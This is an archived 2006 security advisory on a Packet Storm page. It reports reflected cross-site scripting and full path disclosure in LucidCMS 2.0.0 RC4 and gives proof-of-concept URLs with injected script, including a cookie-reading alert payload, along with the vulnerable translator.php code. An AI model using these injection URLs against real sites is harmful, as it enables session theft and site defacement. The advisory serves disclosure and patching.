what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LucidCMS.txt

LucidCMS.txt
Posted Apr 11, 2006
Authored by crasher

lucidCMS 2.0.0 RC4 suffers from XSS and full path disclosure.

tags | advisory
SHA-256 | f51b245fc4e09587c18170010848da6d79243a5b01e7af91b1a0bdcb3561f484

LucidCMS.txt

Change Mirror Download
Multiple Vulnerabilities in LucidCMS

Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April,1st 2006
Location : Indonesia, Cilacap

--- Software description

lucidCMS is a simple and flexible content management system for
the individual or organization that wishes to manage a collection
of web pages without the overhead and complexity of other available
open source "community" CMS options.

HOME : http://lucidCMS.net
Version : 2.0.0 RC4

--- The bugs

There's 2 bugs.XSS and full path disclosures

--- PoC


1. XSS a.k.a Cross site scripting

How the Proof of concepts ?

http://[victim]/[lucidcms_dir]/index.php?command=login'>[XSS_here]
http://[victim]/[lucidcms_dir]/index.php?i18n=cs_CZ&command=panel'>[XSS_here]
http://[victim]/[lucidcms_dir]/index.php?i18n=en_US&command=panel'>[XSS_here]

example :


http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><script>alert(document.cookie)</script>

http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><h1>Bla bla
bla</h1>

http://127.0.0.1/lucidcms/index.php?command=login'><script>alert('patch your
lucidCMS')</script>


http://127.0.0.1/lucidcms/index.php?i18n=cs_CZ&command=panel'><h1>stooopidz</h1>


2. Full path disclosures

in /lucid_phplib/translator.php

http://[victim]/[lucidcms_dir]/lucid_phplib/translator.php

Warning: opendir(DIR_LANG): failed to open dir: No such file or directory in
/var/www/html/lucidcms/lucid_phplib/translator.php on line 45

Warning: readdir(): supplied argument is not a valid Directory resource in
/var/www/html/lucidcms/lucid_phplib/translator.php on line 46

Where's the problem ???

function get_languages(){
$langs = array();
$dir = opendir(DIR_LANG); <-- This is the trouble
while($name = readdir($dir)) { <-- and this too
if ($name == '.' || $name== '..') continue;
$langFile = DIR_LANG.$name.'/LC_MESSAGES/'.CONFIG_DOMAIN.'.mo';
if (file_exists($langFile)) {
// $GLOBALS['echoLater'][] = $langFile; //troublshooting...
$langs[] = $name;
}
}
return $langs;
}//get_languages


--- vendor

I'm too lazy :D .

--- shoutz

1. kecoak
(fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
2. echo staff (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
anonymous, the day)
3. ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,negative,sakitjiwa

--- contact

crasher@kecoak.or.id

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close